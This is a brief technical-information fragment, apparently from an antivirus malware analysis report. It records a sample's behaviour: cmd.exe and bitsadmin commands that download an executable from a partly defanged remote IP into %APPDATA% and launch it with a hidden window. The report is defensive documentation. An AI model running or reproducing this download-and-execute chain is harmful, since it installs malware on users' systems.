Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "Qwmz=%RANDOM%" && bitsadmin /transfer STp /download /priority high "http://94.#02.63.7/subid1.exe" "%APPDATA%\!Qwmz!.tmp" && START "" "%APPDATA%\!Qwmz!.tmp"
- '94.#02.63.7':80
- '<SYSTEM32>\cmd.exe' /V /C set "Qwmz=%RANDOM%" && bitsadmin /transfer STp /download /priority high "http://94.#02.63.7/subid1.exe" "%APPDATA%\!Qwmz!.tmp" && START "" "%APPDATA%\!Qwmz!.tmp"' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer STp /download /priority high "http://94.#02.63.7/subid1.exe" "%APPDATA%\27258.tmp"